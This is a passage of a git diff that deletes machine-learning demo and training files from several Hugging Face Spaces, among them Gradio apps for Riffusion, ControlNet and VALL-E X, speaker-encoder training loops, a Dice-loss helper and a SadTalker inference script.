np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def load_wav_to_torch(full_path): - sampling_rate, data = read(full_path) - return torch.FloatTensor(data.astype(np.float32)), sampling_rate - - -def load_filepaths_and_text(filename, split="|"): - with open(filename, encoding='utf-8') as f: - filepaths_and_text = [line.strip().split(split) for line in f] - return filepaths_and_text - - -def get_hparams(init=True): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', type=str, default="./configs/base.json", - help='JSON file for configuration') - parser.add_argument('-m', '--model', type=str, required=True, - help='Model name') - - args = parser.parse_args() - model_dir = os.path.join("./logs", args.model) - - if not os.path.exists(model_dir): - os.makedirs(model_dir) - - config_path = args.config - config_save_path = os.path.join(model_dir, "config.json") - if init: - with open(config_path, "r") as f: - data = f.read() - with open(config_save_path, "w") as f: - f.write(data) - else: - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_dir(model_dir): - config_save_path = os.path.join(model_dir, "config.json") - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_file(config_path): - with open(config_path, "r", encoding="utf-8") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - return hparams - - -def check_git_hash(model_dir): - source_dir = os.path.dirname(os.path.realpath(__file__)) - if not os.path.exists(os.path.join(source_dir, ".git")): - logger.warn("{} is not a git repository, therefore hash value comparison will be ignored.".format( - source_dir - )) - return - - cur_hash = subprocess.getoutput("git rev-parse HEAD") - - path = os.path.join(model_dir, "githash") - if os.path.exists(path): - saved_hash = open(path).read() - if saved_hash != cur_hash: - logger.warn("git hash values are different. 
{}(saved) != {}(current)".format( - saved_hash[:8], cur_hash[:8])) - else: - open(path, "w").write(cur_hash) - - -def get_logger(model_dir, filename="train.log"): - global logger - logger = logging.getLogger(os.path.basename(model_dir)) - logger.setLevel(logging.DEBUG) - - formatter = logging.Formatter("%(asctime)s\t%(name)s\t%(levelname)s\t%(message)s") - if not os.path.exists(model_dir): - os.makedirs(model_dir) - h = logging.FileHandler(os.path.join(model_dir, filename)) - h.setLevel(logging.DEBUG) - h.setFormatter(formatter) - logger.addHandler(h) - return logger - - -class HParams(): - def __init__(self, **kwargs): - for k, v in kwargs.items(): - if type(v) == dict: - v = HParams(**v) - self[k] = v - - def keys(self): - return self.__dict__.keys() - - def items(self): - return self.__dict__.items() - - def values(self): - return self.__dict__.values() - - def __len__(self): - return len(self.__dict__) - - def __getitem__(self, key): - return getattr(self, key) - - def __setitem__(self, key, value): - return setattr(self, key, value) - - def __contains__(self, key): - return key in self.__dict__ - - def __repr__(self): - return self.__dict__.__repr__() diff --git a/spaces/jroust/rooster/app.py b/spaces/jroust/rooster/app.py deleted file mode 100644 index ce9ff2a34eb063ea41406e923a6d6ebcdc1efa6d..0000000000000000000000000000000000000000 --- a/spaces/jroust/rooster/app.py +++ /dev/null @@ -1,4 +0,0 @@ -import gradio as gr -name_list = ['spaces/onnx/GPT-2'] -interfaces = [gr.Interface.load(name) for name in name_list] -gr.mix.Parallel(*interfaces, title="cockadoodledo", description="funtimes").launch() \ No newline at end of file diff --git a/spaces/jsxyhelu/skyseg/utils/dice_score.py b/spaces/jsxyhelu/skyseg/utils/dice_score.py deleted file mode 100644 index c07f0d0fbef5fb1552a4cf2a52e5bf7cef1477d4..0000000000000000000000000000000000000000 --- a/spaces/jsxyhelu/skyseg/utils/dice_score.py +++ /dev/null @@ -1,40 +0,0 @@ -import torch -from torch import Tensor - - -def dice_coeff(input: Tensor, target: Tensor, reduce_batch_first: bool = False, epsilon=1e-6): - # Average of Dice coefficient for all batches, or for a single mask - assert input.size() == target.size() - if input.dim() == 2 and reduce_batch_first: - raise ValueError(f'Dice: asked to reduce batch but got tensor without batch dimension (shape {input.shape})') - - if input.dim() == 2 or reduce_batch_first: - inter = torch.dot(input.reshape(-1), target.reshape(-1)) - sets_sum = torch.sum(input) + torch.sum(target) - if sets_sum.item() == 0: - sets_sum = 2 * inter - - return (2 * inter + epsilon) / (sets_sum + epsilon) - else: - # compute and average metric for each batch element - dice = 0 - for i in range(input.shape[0]): - dice += dice_coeff(input[i, ...], target[i, ...]) - return dice / input.shape[0] - - -def multiclass_dice_coeff(input: Tensor, target: Tensor, reduce_batch_first: bool = False, epsilon=1e-6): - # Average of Dice coefficient for all classes - assert input.size() == target.size() - dice = 0 - for channel in range(input.shape[1]): - dice += dice_coeff(input[:, channel, ...], target[:, channel, ...], reduce_batch_first, epsilon) - - return dice / input.shape[1] - - -def dice_loss(input: Tensor, target: Tensor, multiclass: bool = False): - # Dice loss (objective to minimize) between 0 and 1 - assert input.size() == target.size() - fn = multiclass_dice_coeff if multiclass else dice_coeff - return 1 - fn(input, target, reduce_batch_first=True) diff --git a/spaces/jx-yang/deep-thinking/tasks/base.py 
b/spaces/jx-yang/deep-thinking/tasks/base.py deleted file mode 100644 index e0b00fc6d22816ad9c6fbc7fd2d6b1b97913d12f..0000000000000000000000000000000000000000 --- a/spaces/jx-yang/deep-thinking/tasks/base.py +++ /dev/null @@ -1,58 +0,0 @@ -import numpy as np - - -class BaseProbInference: - def __init__(self, prompt_version): - if prompt_version == "default": - self.prompt_version = self.default_prompt_version() - else: - self.prompt_version = prompt_version - - self.raw_data_result = None - self.raw_data_sample = None - self.raw_data_dev = None - - self.can_be_stratified = False - self.CHOICES = None - self.num_base_shot = 1 - - def default_prompt_version(self): - raise NotImplementedError - - def dataset_signature(self): - # { - # "result": (dataset_name, subset, split), # which produce the final result - # "sample": (dataset_name, subset, split), # which we sample ICL few-shot examples - # } - raise NotImplementedError - - def dataset_part(self, part): - return self.dataset_signature()[part] - - def dataset_preprocess(self, raw_data): - raise NotImplementedError - - def handcrafted_exemplars(self): - raise NotImplementedError - - def exemplar_seperator(self): - raise NotImplementedError - - def multiple_choice_promptify(self, query, choice): - raise NotImplementedError - - @staticmethod - def merge_choice_info(choice_info): - merged = {} - for k in ["lm_log_p", "norm_lm_log_p"]: - one_metric_merged = [] - for info in choice_info: - one_metric_merged.append(info[k]) - merged[k] = one_metric_merged - return merged - - @staticmethod - def choice_info_to_predictions(info): - lm_log_p_idx = int(np.argmax(info["lm_log_p"])) - norm_lm_log_p_idx = int(np.argmax(info["norm_lm_log_p"])) - return {"lm_log_p": lm_log_p_idx, "norm_lm_log_p": norm_lm_log_p_idx} diff --git a/spaces/kcagle/AutoGPT/run_continuous.bat b/spaces/kcagle/AutoGPT/run_continuous.bat deleted file mode 100644 index 812aa01c1c5506c452665610c0e9e83a17c426f2..0000000000000000000000000000000000000000 --- a/spaces/kcagle/AutoGPT/run_continuous.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -set argument=--continuous -call run.bat %argument% diff --git a/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py b/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py deleted file mode 100644 index 619952e8de6c390912fe341403a39169592e585d..0000000000000000000000000000000000000000 --- a/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py +++ /dev/null @@ -1,123 +0,0 @@ -from encoder.visualizations import Visualizations -from encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset -from encoder.params_model import * -from encoder.model import SpeakerEncoder -from utils.profiler import Profiler -from pathlib import Path -import torch - -def sync(device: torch.device): - # For correct profiling (cuda operations are async) - if device.type == "cuda": - torch.cuda.synchronize(device) - - -def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, - backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, - no_visdom: bool): - # Create a dataset and a dataloader - dataset = SpeakerVerificationDataset(clean_data_root) - loader = SpeakerVerificationDataLoader( - dataset, - speakers_per_batch, - utterances_per_speaker, - num_workers=8, - ) - - # Setup the device on which to run the forward pass and the loss. 
These can be different, - # because the forward pass is faster on the GPU whereas the loss is often (depending on your - # hyperparameters) faster on the CPU. - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - # FIXME: currently, the gradient is None if loss_device is cuda - loss_device = torch.device("cpu") - - # Create the model and the optimizer - model = SpeakerEncoder(device, loss_device) - optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) - init_step = 1 - - # Configure file path for the model - state_fpath = models_dir.joinpath(run_id + ".pt") - backup_dir = models_dir.joinpath(run_id + "_backups") - - # Load any existing model - if not force_restart: - if state_fpath.exists(): - print("Found existing model \"%s\", loading it and resuming training." % run_id) - checkpoint = torch.load(state_fpath) - init_step = checkpoint["step"] - model.load_state_dict(checkpoint["model_state"]) - optimizer.load_state_dict(checkpoint["optimizer_state"]) - optimizer.param_groups[0]["lr"] = learning_rate_init - else: - print("No model \"%s\" found, starting training from scratch." % run_id) - else: - print("Starting the training from scratch.") - model.train() - - # Initialize the visualization environment - vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) - vis.log_dataset(dataset) - vis.log_params() - device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") - vis.log_implementation({"Device": device_name}) - - # Training loop - profiler = Profiler(summarize_every=10, disabled=False) - for step, speaker_batch in enumerate(loader, init_step): - profiler.tick("Blocking, waiting for batch (threaded)") - - # Forward pass - inputs = torch.from_numpy(speaker_batch.data).to(device) - sync(device) - profiler.tick("Data to %s" % device) - embeds = model(inputs) - sync(device) - profiler.tick("Forward pass") - embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) - loss, eer = model.loss(embeds_loss) - sync(loss_device) - profiler.tick("Loss") - - # Backward pass - model.zero_grad() - loss.backward() - profiler.tick("Backward pass") - model.do_gradient_ops() - optimizer.step() - profiler.tick("Parameter update") - - # Update visualizations - # learning_rate = optimizer.param_groups[0]["lr"] - vis.update(loss.item(), eer, step) - - # Draw projections and save them to the backup folder - if umap_every != 0 and step % umap_every == 0: - print("Drawing and saving projections (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - projection_fpath = backup_dir.joinpath("%s_umap_%06d.png" % (run_id, step)) - embeds = embeds.detach().cpu().numpy() - vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) - vis.save() - - # Overwrite the latest version of the model - if save_every != 0 and step % save_every == 0: - print("Saving the model (step %d)" % step) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, state_fpath) - - # Make a backup - if backup_every != 0 and step % backup_every == 0: - print("Making a backup (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - backup_fpath = backup_dir.joinpath("%s_bak_%06d.pt" % (run_id, step)) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, backup_fpath) - - profiler.tick("Extras (visualizations, saving)") diff --git 
a/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py b/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py deleted file mode 100644 index 436641e8de2d8a359cf581496c05b647cf0043aa..0000000000000000000000000000000000000000 --- a/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import torch -print(f"Torch version: {torch.version.cuda}") - -from stable_diffusion_tf.stable_diffusion import StableDiffusion as StableDiffusionPy -import gradio as gr -from tensorflow import keras -from PIL import Image - -from spectro import wav_bytes_from_spectrogram_image - -keras.mixed_precision.set_global_policy("mixed_float16") #float32 -# load keras model -resolution=512 -sd_dreambooth_model_1=StableDiffusionPy(resolution, resolution, download_weights=False, jit_compile=True) - -sd_dreambooth_model_1.load_weights_from_pytorch_ckpt("riffusion-model-v1.ckpt") - -sd_dreambooth_model_1.diffusion_model.load_weights("dreambooth_riffusion_model_currulao_v1/") - - -def generate_images(prompt: str, num_steps: int, unconditional_guidance_scale: int, temperature: int): - img = sd_dreambooth_model_1.generate( - prompt, - num_steps=num_steps, - unconditional_guidance_scale=unconditional_guidance_scale, - temperature=temperature, - batch_size=1, - ) - - pil_img = Image.fromarray(img[0]) - pil_img.save("img.png") - wav = wav_bytes_from_spectrogram_image(pil_img) - with open("output.wav", "wb") as f: - f.write(wav[0].getbuffer()) - final_video = gr.make_waveform("output.wav", bg_image="img.png") - return final_video - - -# pass function, input type for prompt, the output for multiple images -gr.Interface( - title="Keras Dreambooth Riffusion-Currulao", - description="""This SD model has been fine-tuned from Riffusion to generate spectrograms of [Currulao](https://en.wikipedia.org/wiki/Music_of_Colombia#Currulao) music. Currulao is a traditional Afro-Colombian music and dance genre, characterized by its rhythmic beats, call-and-response singing, and lively percussion instruments, that holds significant cultural and social importance in Colombia, particularly in the Pacific coast region, as a celebration of African heritage and community identity. - To generate the concept, use the phrase 'a $currulao song' in your prompt. 
- """, - fn=generate_images, - inputs=[ - gr.Textbox(label="Prompt", value="a $currulao song, lo-fi"), - gr.Slider(label="Inference steps", value=50), - gr.Slider(label="Guidance scale", value=7.5, maximum=15, minimum=0, step=0.5), - gr.Slider(label='Temperature', value=1, maximum=1.5, minimum=0, step=0.1), - ], - outputs=[ - gr.Video(), - ], - examples=[["a $currulao song", 50, 7.5, 1], - ["a $currulao song, lo-fi, nostalgic", 100, 9.5, 0.7]], - ).queue().launch(debug=True) \ No newline at end of file diff --git a/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py b/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py deleted file mode 100644 index 2e9485afbeead6a063b5ef69a85f05757d6c91ff..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py +++ /dev/null @@ -1,125 +0,0 @@ -from speaker_encoder.visualizations import Visualizations -from speaker_encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset -from speaker_encoder.params_model import * -from speaker_encoder.model import SpeakerEncoder -from utils.profiler import Profiler -from pathlib import Path -import torch - -def sync(device: torch.device): - # FIXME - return - # For correct profiling (cuda operations are async) - if device.type == "cuda": - torch.cuda.synchronize(device) - -def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, - backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, - no_visdom: bool): - # Create a dataset and a dataloader - dataset = SpeakerVerificationDataset(clean_data_root) - loader = SpeakerVerificationDataLoader( - dataset, - speakers_per_batch, # 64 - utterances_per_speaker, # 10 - num_workers=8, - ) - - # Setup the device on which to run the forward pass and the loss. These can be different, - # because the forward pass is faster on the GPU whereas the loss is often (depending on your - # hyperparameters) faster on the CPU. - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - # FIXME: currently, the gradient is None if loss_device is cuda - loss_device = torch.device("cpu") - - # Create the model and the optimizer - model = SpeakerEncoder(device, loss_device) - optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) - init_step = 1 - - # Configure file path for the model - state_fpath = models_dir.joinpath(run_id + ".pt") - backup_dir = models_dir.joinpath(run_id + "_backups") - - # Load any existing model - if not force_restart: - if state_fpath.exists(): - print("Found existing model \"%s\", loading it and resuming training." % run_id) - checkpoint = torch.load(state_fpath) - init_step = checkpoint["step"] - model.load_state_dict(checkpoint["model_state"]) - optimizer.load_state_dict(checkpoint["optimizer_state"]) - optimizer.param_groups[0]["lr"] = learning_rate_init - else: - print("No model \"%s\" found, starting training from scratch." 
% run_id) - else: - print("Starting the training from scratch.") - model.train() - - # Initialize the visualization environment - vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) - vis.log_dataset(dataset) - vis.log_params() - device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") - vis.log_implementation({"Device": device_name}) - - # Training loop - profiler = Profiler(summarize_every=10, disabled=False) - for step, speaker_batch in enumerate(loader, init_step): - profiler.tick("Blocking, waiting for batch (threaded)") - - # Forward pass - inputs = torch.from_numpy(speaker_batch.data).to(device) - sync(device) - profiler.tick("Data to %s" % device) - embeds = model(inputs) - sync(device) - profiler.tick("Forward pass") - embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) - loss, eer = model.loss(embeds_loss) - sync(loss_device) - profiler.tick("Loss") - - # Backward pass - model.zero_grad() - loss.backward() - profiler.tick("Backward pass") - model.do_gradient_ops() - optimizer.step() - profiler.tick("Parameter update") - - # Update visualizations - # learning_rate = optimizer.param_groups[0]["lr"] - vis.update(loss.item(), eer, step) - - # Draw projections and save them to the backup folder - if umap_every != 0 and step % umap_every == 0: - print("Drawing and saving projections (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - projection_fpath = backup_dir.joinpath("%s_umap_%06d.png" % (run_id, step)) - embeds = embeds.detach().cpu().numpy() - vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) - vis.save() - - # Overwrite the latest version of the model - if save_every != 0 and step % save_every == 0: - print("Saving the model (step %d)" % step) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, state_fpath) - - # Make a backup - if backup_every != 0 and step % backup_every == 0: - print("Making a backup (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - backup_fpath = backup_dir.joinpath("%s_bak_%06d.pt" % (run_id, step)) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, backup_fpath) - - profiler.tick("Extras (visualizations, saving)") - diff --git a/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py b/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py deleted file mode 100644 index c23738dce545e356921b996a192b98cfc81de0dd..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py +++ /dev/null @@ -1,99 +0,0 @@ -#!/usr/bin/env python - -import gradio as gr - -from settings import ( - DEFAULT_IMAGE_RESOLUTION, - DEFAULT_NUM_IMAGES, - MAX_IMAGE_RESOLUTION, - MAX_NUM_IMAGES, - MAX_SEED, -) -from utils import randomize_seed_fn - - -def create_demo(process): - with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - image = gr.Image() - prompt = gr.Textbox(label="Prompt") - run_button = gr.Button("Run") - with gr.Accordion("Advanced options", open=False): - num_samples = gr.Slider( - label="Number of images", minimum=1, maximum=MAX_NUM_IMAGES, value=DEFAULT_NUM_IMAGES, step=1 - ) - image_resolution = gr.Slider( - label="Image resolution", - minimum=256, - maximum=MAX_IMAGE_RESOLUTION, - value=DEFAULT_IMAGE_RESOLUTION, - step=256, - ) - preprocess_resolution = gr.Slider( - label="Preprocess resolution", minimum=128, maximum=512, value=512, step=1 - ) - 
mlsd_value_threshold = gr.Slider( - label="Hough value threshold (MLSD)", minimum=0.01, maximum=2.0, value=0.1, step=0.01 - ) - mlsd_distance_threshold = gr.Slider( - label="Hough distance threshold (MLSD)", minimum=0.01, maximum=20.0, value=0.1, step=0.01 - ) - num_steps = gr.Slider(label="Number of steps", minimum=1, maximum=100, value=20, step=1) - guidance_scale = gr.Slider(label="Guidance scale", minimum=0.1, maximum=30.0, value=9.0, step=0.1) - seed = gr.Slider(label="Seed", minimum=0, maximum=MAX_SEED, step=1, value=0) - randomize_seed = gr.Checkbox(label="Randomize seed", value=True) - a_prompt = gr.Textbox(label="Additional prompt", value="best quality, extremely detailed") - n_prompt = gr.Textbox( - label="Negative prompt", - value="longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality", - ) - with gr.Column(): - result = gr.Gallery(label="Output", show_label=False, columns=2, object_fit="scale-down") - inputs = [ - image, - prompt, - a_prompt, - n_prompt, - num_samples, - image_resolution, - preprocess_resolution, - num_steps, - guidance_scale, - seed, - mlsd_value_threshold, - mlsd_distance_threshold, - ] - prompt.submit( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - api_name=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name=False, - ) - run_button.click( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - api_name=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name="mlsd", - ) - return demo - - -if __name__ == "__main__": - from model import Model - - model = Model(task_name="MLSD") - demo = create_demo(model.process_mlsd) - demo.queue().launch() diff --git a/spaces/kevinwang676/VALLE/descriptions.py b/spaces/kevinwang676/VALLE/descriptions.py deleted file mode 100644 index cd75197dff19f1bb8dc4e9b6d1ea89ac44e4dd55..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VALLE/descriptions.py +++ /dev/null @@ -1,27 +0,0 @@ -top_md = """ -# VALL-E X -[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1yyD_sz531QntLKowMHo-XxorsFBCfKul?usp=sharing) -VALL-E X can synthesize high-quality personalized speech with only a 3-second enrolled recording of -an unseen speaker as an acoustic prompt, even in another language for a monolingual speaker.
    -This implementation supports zero-shot, mono-lingual/cross-lingual text-to-speech functionality of three languages (English, Chinese, Japanese)
    -See this [demo](https://plachtaa.github.io/) page for more details. -""" - -infer_from_audio_md = """ -Upload a speech of 3~10 seconds as the audio prompt and type in the text you'd like to synthesize.
    -The model will synthesize speech of given text with the same voice of your audio prompt.
    -The model also tends to preserve the emotion & acoustic environment of your given speech.
    -For faster inference, please use **"Make prompt"** to get a `.npz` file as the encoded audio prompt, and use it by **"Infer from prompt"** -""" - -make_prompt_md = """ -Upload a speech of 3~10 seconds as the audio prompt.
    -Get a `.npz` file as the encoded audio prompt. Use it by **"Infer with prompt"** -""" - -infer_from_prompt_md = """ -Faster than **"Infer from audio"**.
    -You need to **"Make prompt"** first, and upload the encoded prompt (a `.npz` file) -""" - -long_text_example = "Just a few years ago, there were no legions of deep learning scientists developing intelligent products and services at major companies and startups. When we entered the field, machine learning did not command headlines in daily newspapers. Our parents had no idea what machine learning was, let alone why we might prefer it to a career in medicine or law. Machine learning was a blue skies academic discipline whose industrial significance was limited to a narrow set of real-world applications, including speech recognition and computer vision. Moreover, many of these applications required so much domain knowledge that they were often regarded as entirely separate areas for which machine learning was one small component. At that time, neural networks—the predecessors of the deep learning methods that we focus on in this book—were generally regarded as outmoded." \ No newline at end of file diff --git a/spaces/kevinwang676/VoiceChanger/inference.py b/spaces/kevinwang676/VoiceChanger/inference.py deleted file mode 100644 index a0b007901c9848ef8b3409607a4a73cc5a3a5ab9..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VoiceChanger/inference.py +++ /dev/null @@ -1,145 +0,0 @@ -from glob import glob -import shutil -import torch -from time import strftime -import os, sys, time -from argparse import ArgumentParser - -from src.utils.preprocess import CropAndExtract -from src.test_audio2coeff import Audio2Coeff -from src.facerender.animate import AnimateFromCoeff -from src.generate_batch import get_data -from src.generate_facerender_batch import get_facerender_data -from src.utils.init_path import init_path - -def main(args): - #torch.backends.cudnn.enabled = False - - pic_path = args.source_image - audio_path = args.driven_audio - save_dir = os.path.join(args.result_dir, strftime("%Y_%m_%d_%H.%M.%S")) - os.makedirs(save_dir, exist_ok=True) - pose_style = args.pose_style - device = args.device - batch_size = args.batch_size - input_yaw_list = args.input_yaw - input_pitch_list = args.input_pitch - input_roll_list = args.input_roll - ref_eyeblink = args.ref_eyeblink - ref_pose = args.ref_pose - - current_root_path = os.path.split(sys.argv[0])[0] - - sadtalker_paths = init_path(args.checkpoint_dir, os.path.join(current_root_path, 'src/config'), args.size, args.old_version, args.preprocess) - - #init model - preprocess_model = CropAndExtract(sadtalker_paths, device) - - audio_to_coeff = Audio2Coeff(sadtalker_paths, device) - - animate_from_coeff = AnimateFromCoeff(sadtalker_paths, device) - - #crop image and extract 3dmm from image - first_frame_dir = os.path.join(save_dir, 'first_frame_dir') - os.makedirs(first_frame_dir, exist_ok=True) - print('3DMM Extraction for source image') - first_coeff_path, crop_pic_path, crop_info = preprocess_model.generate(pic_path, first_frame_dir, args.preprocess,\ - source_image_flag=True, pic_size=args.size) - if first_coeff_path is None: - print("Can't get the coeffs of the input") - return - - if ref_eyeblink is not None: - ref_eyeblink_videoname = os.path.splitext(os.path.split(ref_eyeblink)[-1])[0] - ref_eyeblink_frame_dir = os.path.join(save_dir, ref_eyeblink_videoname) - os.makedirs(ref_eyeblink_frame_dir, exist_ok=True) - print('3DMM Extraction for the reference video providing eye blinking') - ref_eyeblink_coeff_path, _, _ = preprocess_model.generate(ref_eyeblink, ref_eyeblink_frame_dir, args.preprocess, source_image_flag=False) - 
else: - ref_eyeblink_coeff_path=None - - if ref_pose is not None: - if ref_pose == ref_eyeblink: - ref_pose_coeff_path = ref_eyeblink_coeff_path - else: - ref_pose_videoname = os.path.splitext(os.path.split(ref_pose)[-1])[0] - ref_pose_frame_dir = os.path.join(save_dir, ref_pose_videoname) - os.makedirs(ref_pose_frame_dir, exist_ok=True) - print('3DMM Extraction for the reference video providing pose') - ref_pose_coeff_path, _, _ = preprocess_model.generate(ref_pose, ref_pose_frame_dir, args.preprocess, source_image_flag=False) - else: - ref_pose_coeff_path=None - - #audio2ceoff - batch = get_data(first_coeff_path, audio_path, device, ref_eyeblink_coeff_path, still=args.still) - coeff_path = audio_to_coeff.generate(batch, save_dir, pose_style, ref_pose_coeff_path) - - # 3dface render - if args.face3dvis: - from src.face3d.visualize import gen_composed_video - gen_composed_video(args, device, first_coeff_path, coeff_path, audio_path, os.path.join(save_dir, '3dface.mp4')) - - #coeff2video - data = get_facerender_data(coeff_path, crop_pic_path, first_coeff_path, audio_path, - batch_size, input_yaw_list, input_pitch_list, input_roll_list, - expression_scale=args.expression_scale, still_mode=args.still, preprocess=args.preprocess, size=args.size) - - result = animate_from_coeff.generate(data, save_dir, pic_path, crop_info, \ - enhancer=args.enhancer, background_enhancer=args.background_enhancer, preprocess=args.preprocess, img_size=args.size) - - shutil.move(result, save_dir+'.mp4') - print('The generated video is named:', save_dir+'.mp4') - - if not args.verbose: - shutil.rmtree(save_dir) - - -if __name__ == '__main__': - - parser = ArgumentParser() - parser.add_argument("--driven_audio", default='./examples/driven_audio/bus_chinese.wav', help="path to driven audio") - parser.add_argument("--source_image", default='./examples/source_image/full_body_1.png', help="path to source image") - parser.add_argument("--ref_eyeblink", default=None, help="path to reference video providing eye blinking") - parser.add_argument("--ref_pose", default=None, help="path to reference video providing pose") - parser.add_argument("--checkpoint_dir", default='./checkpoints', help="path to output") - parser.add_argument("--result_dir", default='./results', help="path to output") - parser.add_argument("--pose_style", type=int, default=0, help="input pose style from [0, 46)") - parser.add_argument("--batch_size", type=int, default=2, help="the batch size of facerender") - parser.add_argument("--size", type=int, default=256, help="the image size of the facerender") - parser.add_argument("--expression_scale", type=float, default=1., help="the batch size of facerender") - parser.add_argument('--input_yaw', nargs='+', type=int, default=None, help="the input yaw degree of the user ") - parser.add_argument('--input_pitch', nargs='+', type=int, default=None, help="the input pitch degree of the user") - parser.add_argument('--input_roll', nargs='+', type=int, default=None, help="the input roll degree of the user") - parser.add_argument('--enhancer', type=str, default=None, help="Face enhancer, [gfpgan, RestoreFormer]") - parser.add_argument('--background_enhancer', type=str, default=None, help="background enhancer, [realesrgan]") - parser.add_argument("--cpu", dest="cpu", action="store_true") - parser.add_argument("--face3dvis", action="store_true", help="generate 3d face and 3d landmarks") - parser.add_argument("--still", action="store_true", help="can crop back to the original videos for the full body aniamtion") - 
parser.add_argument("--preprocess", default='crop', choices=['crop', 'extcrop', 'resize', 'full', 'extfull'], help="how to preprocess the images" ) - parser.add_argument("--verbose",action="store_true", help="saving the intermedia output or not" ) - parser.add_argument("--old_version",action="store_true", help="use the pth other than safetensor version" ) - - - # net structure and parameters - parser.add_argument('--net_recon', type=str, default='resnet50', choices=['resnet18', 'resnet34', 'resnet50'], help='useless') - parser.add_argument('--init_path', type=str, default=None, help='Useless') - parser.add_argument('--use_last_fc',default=False, help='zero initialize the last fc') - parser.add_argument('--bfm_folder', type=str, default='./checkpoints/BFM_Fitting/') - parser.add_argument('--bfm_model', type=str, default='BFM_model_front.mat', help='bfm model') - - # default renderer parameters - parser.add_argument('--focal', type=float, default=1015.) - parser.add_argument('--center', type=float, default=112.) - parser.add_argument('--camera_d', type=float, default=10.) - parser.add_argument('--z_near', type=float, default=5.) - parser.add_argument('--z_far', type=float, default=15.) - - args = parser.parse_args() - - if torch.cuda.is_available() and not args.cpu: - args.device = "cuda" - else: - args.device = "cpu" - - main(args) - diff --git a/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py b/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py deleted file mode 100644 index dac7b33d5889777eb63c9882a3b9fa094dcab293..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VoiceChanger/src/face3d/models/template_model.py +++ /dev/null @@ -1,100 +0,0 @@ -"""Model class template - -This module provides a template for users to implement custom models. -You can specify '--model template' to use this model. -The class name should be consistent with both the filename and its model option. -The filename should be _dataset.py -The class name should be Dataset.py -It implements a simple image-to-image translation baseline based on regression loss. -Given input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss: - min_ ||netG(data_A) - data_B||_1 -You need to implement the following functions: - : Add model-specific options and rewrite default values for existing options. - <__init__>: Initialize this model class. - : Unpack input data and perform data pre-processing. - : Run forward pass. This will be called by both and . - : Update network weights; it will be called in every training iteration. -""" -import numpy as np -import torch -from .base_model import BaseModel -from . import networks - - -class TemplateModel(BaseModel): - @staticmethod - def modify_commandline_options(parser, is_train=True): - """Add new model-specific options and rewrite default values for existing options. - - Parameters: - parser -- the option parser - is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options. - - Returns: - the modified parser. - """ - parser.set_defaults(dataset_mode='aligned') # You can rewrite default values for this model. For example, this model usually uses aligned dataset 